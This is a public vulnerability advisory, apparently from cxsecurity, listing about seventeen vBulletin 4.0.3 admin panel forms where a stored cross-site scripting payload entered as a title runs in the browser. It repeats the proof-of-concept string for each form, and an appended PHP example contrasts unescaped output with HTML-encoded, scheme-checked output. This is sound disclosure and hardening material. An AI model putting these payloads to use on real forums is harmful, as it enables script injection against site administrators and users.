vBulletin [4.0.3] adminCP Cross-Site Scripting

2010-05-06 / 2010-05-07
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

###########################################################################
#                                                                         #
#        -:: vBulletin [4.0.3] adminCP Cross-Site Scripting :: -          #
#                                                                         #
# Exploit Title: vBulletin adminCP Cross-Site Scripting                   #
# Date: 2010                                                              #
# Author:[ Ashiyane Digital Security Team ] [Cair3x]                      #
# Software Link: http://www.vBulletin.com                                 #
# Version: 4.0.3                                                          #
# Tested on: vBulletin 4.0.3                                              #
# Exploited : [ scriptplazza ]                                            #
###########################################################################

-:: Generic Smilies Manager => Add New Generic Smilies ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=smilie )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Avatars Manager => Add New Avatars ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=icon )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: User Titles Manager => Add New User Titles ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/usertitle.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: User Reputations Manager => Add New User Reputations ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/adminreputation.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: User Profile Fields Manager => Add New User Profile Fields ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/profilefield.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Usergroups Manager => Add New Usergroups ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Forum Announcements => Add New Announcements ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/announcement.php?do=add )
Go To ( http://127.0.0.1/vb/amodcp/announcement.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Forum Notices => Add New Notices ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/notice.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Forum Advertising => Add New Advertising ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/ad.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Forum Manager => Add New Forum Manager ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Calendar Manager => Add New Calendar ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: Usergroup Manager => Add New Usergroup ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code.

-:: User Rank Manager => Rank Type ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add )
Use the following code as (OR you may enter text HTML is allowed) Text.
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: BB Code Manager => Add New BB Code ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add )
Complete All Required Fields And Enter Javascript Code in Title :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code.

-:: Scheduled Task Manager => Add New Scheduled Task ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit )
Complete All Required Fields And Enter Javascript Code in Title :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code

-:: FAQ Manager => Add New FAQ Item ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code.

-:: Style Manager => Add New Style ::-

Exploit :
Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle )
Add a new title. Use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::-
Or Any Other Xss Code
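
Every form listed above has the same shape: a title is stored and later echoed back into an admin page. The PHP below is an added example of the vulnerable output pattern next to its hardened form; it is not vBulletin source and not part of the advisory, the function names are hypothetical, and it assumes the stored title is rendered either as HTML text or as a link target.

```php
<?php
// Added example, not vBulletin code. All function names are hypothetical.

// Title string quoted in the advisory, used here only as sample input.
const ADVISORY_TITLE = "javascript://%0adocument.write('<script>alert(0)</script>')";

// Vulnerable pattern: the stored title is concatenated into markup unchanged,
// so any tag inside it is parsed by the browser.
function render_title_unsafe(string $title): string
{
    return '<td class="title">' . $title . '</td>';
}

// Hardened: encode for the HTML text/attribute context at output time.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_title(string $title): string
{
    return '<td class="title">' . html_encode($title) . '</td>';
}

// Hardened for a URL context: HTML encoding alone does not neutralise a
// javascript: URI placed in href, so only http and https are accepted and
// anything else (including unparsable input) falls back to "#".
function render_title_link(string $url, string $label): string
{
    $url = trim($url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    $allowed = is_string($scheme)
        && in_array(strtolower($scheme), ['http', 'https'], true);
    $href = $allowed ? html_encode($url) : '#';
    return '<a href="' . $href . '">' . html_encode($label) . '</a>';
}

// Print the three renderings of the advisory string, then one benign link.
echo render_title_unsafe(ADVISORY_TITLE), "\n";
echo render_title(ADVISORY_TITLE), "\n";
echo render_title_link(ADVISORY_TITLE, 'Smilie'), "\n";
echo render_title_link('http://127.0.0.1/vb/', 'Forum'), "\n";
```

Encoding at output time, rather than filtering at input time, also covers titles that were already stored before the fix.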



Copyright 2024, cxsecurity.com
